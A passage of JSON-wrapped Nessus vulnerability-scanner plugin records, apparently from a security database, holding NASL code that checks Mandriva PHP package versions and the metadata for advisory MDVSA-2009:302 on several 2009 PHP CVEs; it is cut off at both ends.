reference:\"php-mcrypt-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mhash-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mime_magic-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ming-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mssql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mysql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mysqli-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ncurses-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-odbc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-openssl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pcntl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_dblib-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_mysql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_odbc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_pgsql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pdo_sqlite-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pgsql-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-posix-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-pspell-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-readline-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-recode-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-session-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-shmop-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-snmp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-soap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sockets-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sqlite-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sysvmsg-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sysvsem-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-sysvshm-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-tidy-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-tokenizer-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-wddx-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xml-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlreader-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlrpc-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xmlwriter-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-xsl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-zlib-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libphp5_common5-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-bcmath-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-bz2-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-calendar-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-cgi-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-cli-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ctype-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-curl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dba-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dbase-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-devel-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-dom-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-exif-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-fcgi-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-filter-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ftp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gd-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gettext-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-gmp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-hash-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-iconv-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-imap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-json-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ldap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mbstring-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mcrypt-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mhash-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mime_magic-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ming-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mssql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mysql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-mysqli-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-ncurses-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-odbc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-openssl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pcntl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_dblib-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_mysql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_odbc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_pgsql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pdo_sqlite-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pgsql-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-posix-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-pspell-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-readline-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-recode-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-session-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-shmop-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-snmp-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-soap-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sockets-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sqlite-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sybase-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvmsg-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvsem-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-sysvshm-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-tidy-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-tokenizer-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-wddx-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xml-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xmlreader-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xmlrpc-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xmlwriter-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-xsl-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"php-zlib-5.2.6-18.7mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:24", "description": "Some vulnerabilities were discovered and corrected in php-5.3.1 :\n\n - Added max_file_uploads INI directive, which can be set\n to limit the number of file uploads per-request to 20 by\n default, to prevent possible DOS via temporary file\n exhaustion. (Ilia)\n\n - Added missing sanity checks around exif processing.\n (CVE-2009-3292, Ilia)\n\n - Fixed a safe_mode bypass in tempnam() identified by\n Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\n\n - Fixed a open_basedir bypass in posix_mkfifo() identified\n by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus)\n\n - Fixed bug #50063 (safe_mode_include_dir fails).\n (CVE-2009-3559, Johannes, christian at elmerot dot se)\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.", "edition": 25, "published": "2010-07-30T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:302)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3558", "CVE-2009-3292", "CVE-2009-3559", "CVE-2009-3557"], "modified": "2010-07-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-sqlite3", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-sybase_ct", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-apc", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:php-fileinfo", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:apache-mod_php", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-doc", "p-cpe:/a:mandriva:linux:php-enchant", "p-cpe:/a:mandriva:linux:php-pgsql", "cpe:/o:mandriva:linux:2010.0", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-eaccelerator", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-apc-admin", "p-cpe:/a:mandriva:linux:php-eaccelerator-admin", "p-cpe:/a:mandriva:linux:php-intl", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2009-302.NASL", "href": "https://www.tenable.com/plugins/nessus/48158", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:302. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48158);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3292\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-3559\");\n script_bugtraq_id(37079);\n script_xref(name:\"MDVSA\", value:\"2009:302\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:302)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Some vulnerabilities were discovered and corrected in php-5.3.1 :\n\n - Added max_file_uploads INI directive, which can be set\n to limit the number of file uploads per-request to 20 by\n default, to prevent possible DOS via temporary file\n exhaustion. (Ilia)\n\n - Added missing sanity checks around exif processing.\n (CVE-2009-3292, Ilia)\n\n - Fixed a safe_mode bypass in tempnam() identified by\n Grzegorz Stachowiak. (CVE-2009-3557, Rasmus)\n\n - Fixed a open_basedir bypass in posix_mkfifo() identified\n by Grzegorz Stachowiak. (CVE-2009-3558, Rasmus)\n\n - Fixed bug #50063 (safe_mode_include_dir fails).\n (CVE-2009-3559, Johannes, christian at elmerot dot se)\n\nAdditionally, some packages which require so, have been rebuilt and\nare being provided as updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://news.php.net/php.announce/79\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase_ct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) 